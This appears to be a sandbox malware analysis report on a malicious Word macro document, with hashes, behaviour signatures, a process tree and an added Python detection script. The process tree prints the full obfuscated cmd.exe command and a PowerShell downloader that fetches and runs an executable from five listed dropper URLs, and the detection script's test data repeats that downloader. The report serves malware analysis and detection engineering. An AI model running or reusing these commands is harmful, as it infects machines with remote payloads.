Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25-05-2024 17:11

General

  • Target

    72abbface4c8cea179df95e9717cfde4_JaffaCakes118.doc

  • Size

    203KB

  • MD5

    72abbface4c8cea179df95e9717cfde4

  • SHA1

    c358ec289edd6febf28edd2c518ba43055c78086

  • SHA256

    f349dcd66a084e8b9b503b274d9128d22931497b78675b8e8ab424977db22275

  • SHA512

    653bd8f5e4c9d57b39545a7372f3273dbf573ce064ed4c450628f53402738cade128fafc0f8c79f011072edf9e20f9da9bbf3271f42b977ebc129bb3229f86f0

  • SSDEEP

    3072:Xte2dw99fk3vIAWHWaaYuK5vE0B8FlgN2zU/Li0LZ:9Hdw7kwAWHWFK5TBmlgNfLFZ

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://stalfond-n.ru/KDYGGWK

exe.dropper

http://skladvysotka.ru/tbf6tn5r

exe.dropper

http://tdov.ru/0KJ9f6g

exe.dropper

http://doop.pl/Q3XAEGW7

exe.dropper

http://tranz2000.net/del/4Wpsnr5sxD

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
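
The first three signatures are the ones a detection engineer can act on directly: an Office host spawning a shell, a shell whose command line is dense with carets and uses the `/V` delayed-expansion substring loop, and a PowerShell descendant that fetches and runs a file. The Python below is an added example (not part of the sandbox report) that encodes those three checks and runs them over constructed process-creation events modelled on the tree in this report, with the real cmd.exe line replaced by a shortened stand-in that keeps the same markers, the PowerShell URL list trimmed, and a benign `explorer.exe -> cmd.exe` event invented for contrast. Image names are compared case-insensitively because the sample spells its child `CMd.exe` under `SYSTEM32`.

```python
import re
from collections import defaultdict

# Constructed events (Sysmon Event ID 1 style fields) modelled on this report's tree:
# explorer -> WINWORD.EXE (3772) -> CMd.exe (4844) -> powershell.exe (944).
# The cmd.exe line is a short stand-in with the real one's markers (carets, /V,
# for /L, :~ substring expansion, call); PID 5555 is an invented benign entry.
EVENTS = [
    {"pid": 1000, "ppid": 500, "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\explorer.exe"},
    {"pid": 3772, "ppid": 1000,
     "image": r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n '
                r'"C:\Users\Admin\AppData\Local\Temp\72abbface4c8cea179df95e9717cfde4_JaffaCakes118.doc" /o ""'},
    {"pid": 4844, "ppid": 3772, "image": r"C:\Windows\SYSTEM32\CMd.exe",
     "cmdline": 'CMd /V/C"s^e^t x=^p^0^w^1^e^2^r&&^f^or /^L %^Z ^in (^1^4^1^5,^-4,^3)^d^o '
                'se^t y=!y!!x:~%^Z,1!&&^i^f %^Z=^=^3 c^al^l %y:~^5%"'},
    {"pid": 944, "ppid": 4844,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell $mCQ=new-object Net.WebClient;$LRP='http://stalfond-n.ru/KDYGGWK@"
                r"http://skladvysotka.ru/tbf6tn5r'.Split('@');$Lai = '692';"
                r"$oXM=$env:public+'\'+$Lai+'.exe';foreach($PPI in $LRP){try{"
                r"$mCQ.DownloadFile($PPI, $oXM);Invoke-Item $oXM;break;}catch{}}"},
    {"pid": 5555, "ppid": 1000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c dir C:\Temp"},
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
           "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}


def basename(path):
    # Case-insensitive: the sample's child is spelled CMd.exe under SYSTEM32.
    return path.rsplit("\\", 1)[-1].lower()


def caret_obfuscated(cmdline):
    """Two independent tells: caret density, and the /V delayed-expansion
    substring loop (`for /L ... :~%Z,1`) that reassembles a hidden string."""
    carets = cmdline.count("^")
    dense = carets >= 10 and carets / max(len(cmdline), 1) > 0.05
    plain = cmdline.replace("^", "")  # what cmd sees after escape processing
    loop = re.search(r"for\s+/L\b", plain, re.I) is not None and ":~" in plain
    return dense or loop


def ps_downloader(cmdline):
    """Fetch primitive plus an execute primitive in the same command line."""
    plain = cmdline.replace("^", "")
    fetch = re.search(r"Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest", plain, re.I)
    run = re.search(r"Invoke-Item|Start-Process|\bIEX\b|Invoke-Expression", plain, re.I)
    return fetch is not None and run is not None


def analyse(events):
    """Return {pid: [finding, ...]} for every event that trips a check."""
    by_pid = {e["pid"]: e for e in events}
    findings = defaultdict(list)
    for e in events:
        img = basename(e["image"])
        # Walk up to three ancestors: the PowerShell here is a grandchild of Word.
        ppid, depth = e["ppid"], 0
        while ppid in by_pid and depth < 3:
            parent = by_pid[ppid]
            if basename(parent["image"]) in OFFICE and img in LOLBINS:
                findings[e["pid"]].append("office_child" if depth == 0 else "office_descendant")
                break
            ppid, depth = parent["ppid"], depth + 1
        if img == "cmd.exe" and caret_obfuscated(e["cmdline"]):
            findings[e["pid"]].append("caret_obfuscation")
        if img in {"powershell.exe", "pwsh.exe"} and ps_downloader(e["cmdline"]):
            findings[e["pid"]].append("ps_downloader")
    return dict(findings)


if __name__ == "__main__":
    for pid, hits in analyse(EVENTS).items():
        print(pid, hits)
```

The ancestry walk matters: a rule that only checks the direct parent would see `powershell.exe` under `cmd.exe` and miss that the chain starts in `WINWORD.EXE`. The caret check strips escapes before looking for `for /L`, since the sample writes it as `^f^or /^L`.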

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\72abbface4c8cea179df95e9717cfde4_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3772
    • C:\Windows\SYSTEM32\CMd.exe
      CMd /V/C"s^e^t +{^,^'=^519 ^93^1 ^35^1^ 1^53^ 1^59^ 1^09 ^093 ^1^05^ ^109 910 1^0^9^ ^301 ^3^01 13^9 ^35^1^ ^5^09 ^039 0^1^5}^5^03^}^13^5{5^31h^5^0^9c^319t5^9^0^a310c^309^}9^3^0^;10^5k903a^051^e905r^1^59^b^0^5^1^;13^0M^05^3^X^913^o0^15$^0^9^1 1^5^0^m035^e^015^t^9^01I9^03^-5^1^3^e1^30k^1^90o^3^9^5v^3^1^0n^9^0^3^I^593^;^150)^1^03M^5^3^9^X193^o^519^$5^0^3 5^3^0,^0^1^3^I5^1^9P^1^59P^1^59$3^19(^195^e^0^15l0^19i1^0^3^F9^0^3^d^1^5^9a91^0o^9^53l5^9^1n0^5^9w^53^9o159D^1^3^5.5^3^9Q^9^3^5C^31^0m^351$9^1^3^{310y3^0^1r^5^9^3^t310{^30^5)3^95P^193R5^09^L^593$^3^90^ 93^5n^0^19i1^0^3 5^13^I3^5^0P3^5^0^P^53^1^$105(^15^0^h903c^3^1^0a93^0e^53^9r039^o51^3^f^301^;3^1^0^'91^5e^190x0^1^5^e^1^30^.190'^50^9+^139^i019a^3^05^L^3^0^5^$^95^0+^01^5^'5^9^1\95^0'^395^+^53^0c9^1^5^i05^9^l^390^b^39^1u^09^5p^053^:531v^51^9n^3^0^5e1^05^$^9^0^1=095^M1^0^9X^3^1^5^o^9^50$^1^5^0^;^1^03'9^0^3^2^0^19^990^360^39^'^0^31 ^3^0^5^=^3^0^1 ^0^5^3^i^0^19^a^3^9^5^L0^1^5$0^3^9;3^10)^15^0'5^01@^39^5'^0^5^1(1^0^9t^1^53^i^3^59^l^9^51p^3^19S^0^3^1.^3^51'9^5^0D^159x0^9^3s13559^0^1r5^3^0n3^59^s^01^3p9^05W1^35^459^0/^503l^1^0^9e^31^9^d1^0^3/^1^3^5^t9^30e^0^35n0^1^3^.^5^03^0^305^0^90^10^19^323^05^z^5^91n^9^1^5a510r^35^9t^1^95/^0^39/9^0^1^:^10^9p0^9^3^t0^53t93^1h^5^0^3@51^3735^9W150G1^5^0E0^91^A^935X^053^3^9^1^0Q^95^1/^3^1^9l019^p9^5^0^.0^39^p^5^9^1^o50^9^o031d^3^1^0/1^59/^09^1:^91^5p510^t5^39t10^9h530^@^30^9^g93^1^690^1^f^03^59^90^5J0^1^9K91^500^1^5/^09^1u^19^3r^3^5^1.^9^01v^903^o390d^50^1t^01^9/^3^9^5/^0^5^1^:953p^903t^3^0^9^t509h^1^50^@9^0^1r^9^1^55^539n50^1^t^1^5^3^653^0f^0^9^3^b01^9t^39^5/^90^5u^059r93^1.0^53^a^1^35^k5^13^t^319o^0^15s3^5^0y^01^3v^30^5^d539^a30^5^l^01^3k^5^10s^5^0^3/^0^31/9^3^1^:0^31p^95^0^t^539^t53^1^h^5^13@^1^3^0^K^19^5^W0^1^5G1^0^3G^30^5^Y^3^15^D^5^9^1^K^5^3^1/19^0^u^0^9^3r^5^9^1.50^1n^190^-51^3^d^3^0^1n^3^0^5o1^05f3^5^1l^0^5^1^a5^9^0t9^35s^1^09/9^1^3/901:^0^39^p03^5t90^5^t90^1h^139^'^5^01^=^50^9P^9^50R91^0^L^35^1$1^50;^359t0^3^1n^35^1e03^9^i9^51^l3^91C9^0^3b^391e3^5^1^W^5^93^.3^1^0t0^91e15^9N^395
 ^3^0^9t^93^0c190e^135j^13^0b^5^3^1^o^0^5^9^-310^w^5^3^0^e^3^9^0n35^0=0^9^3Q^19^3C03^9m^9^5^1^$1^03^ ^9^1^3l^1^93^l^3^50e^13^5^h^310^s^509r0^93^e^390^w^1^50^o0^93^p&&^f^or /^L %^Z ^in (^14^15^,^-4^,^3)^d^o se^t ^'^`^,=!^'^`^,!!+{^,^':~%^Z,1!&&^i^f %^Z=^=^3 c^al^l %^'^`^,:~^5%"
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:4844
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $mCQ=new-object Net.WebClient;$LRP='http://stalfond-n.ru/KDYGGWK@http://skladvysotka.ru/tbf6tn5r@http://tdov.ru/0KJ9f6g@http://doop.pl/Q3XAEGW7@http://tranz2000.net/del/4Wpsnr5sxD'.Split('@');$Lai = '692';$oXM=$env:public+'\'+$Lai+'.exe';foreach($PPI in $LRP){try{$mCQ.DownloadFile($PPI, $oXM);Invoke-Item $oXM;break;}catch{}}
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:944

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCD7A3B.tmp\sist02.xsl

    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_runuclkh.uns.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/944-46-0x00000177A78D0000-0x00000177A78F2000-memory.dmp

    Filesize

    136KB

  • memory/3772-24-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-3-0x00007FFD4156D000-0x00007FFD4156E000-memory.dmp

    Filesize

    4KB

  • memory/3772-28-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-6-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-7-0x00007FFD01550000-0x00007FFD01560000-memory.dmp

    Filesize

    64KB

  • memory/3772-8-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-10-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-9-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-11-0x00007FFCFF4A0000-0x00007FFCFF4B0000-memory.dmp

    Filesize

    64KB

  • memory/3772-12-0x00007FFCFF4A0000-0x00007FFCFF4B0000-memory.dmp

    Filesize

    64KB

  • memory/3772-23-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-27-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-26-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-2-0x00007FFD01550000-0x00007FFD01560000-memory.dmp

    Filesize

    64KB

  • memory/3772-564-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-5-0x00007FFD01550000-0x00007FFD01560000-memory.dmp

    Filesize

    64KB

  • memory/3772-4-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-1-0x00007FFD01550000-0x00007FFD01560000-memory.dmp

    Filesize

    64KB

  • memory/3772-58-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-230-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-0-0x00007FFD01550000-0x00007FFD01560000-memory.dmp

    Filesize

    64KB

  • memory/3772-511-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-510-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-512-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-522-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB

  • memory/3772-562-0x00007FFD01550000-0x00007FFD01560000-memory.dmp

    Filesize

    64KB

  • memory/3772-561-0x00007FFD01550000-0x00007FFD01560000-memory.dmp

    Filesize

    64KB

  • memory/3772-560-0x00007FFD01550000-0x00007FFD01560000-memory.dmp

    Filesize

    64KB

  • memory/3772-563-0x00007FFD01550000-0x00007FFD01560000-memory.dmp

    Filesize

    64KB

  • memory/3772-29-0x00007FFD414D0000-0x00007FFD416C5000-memory.dmp

    Filesize

    2.0MB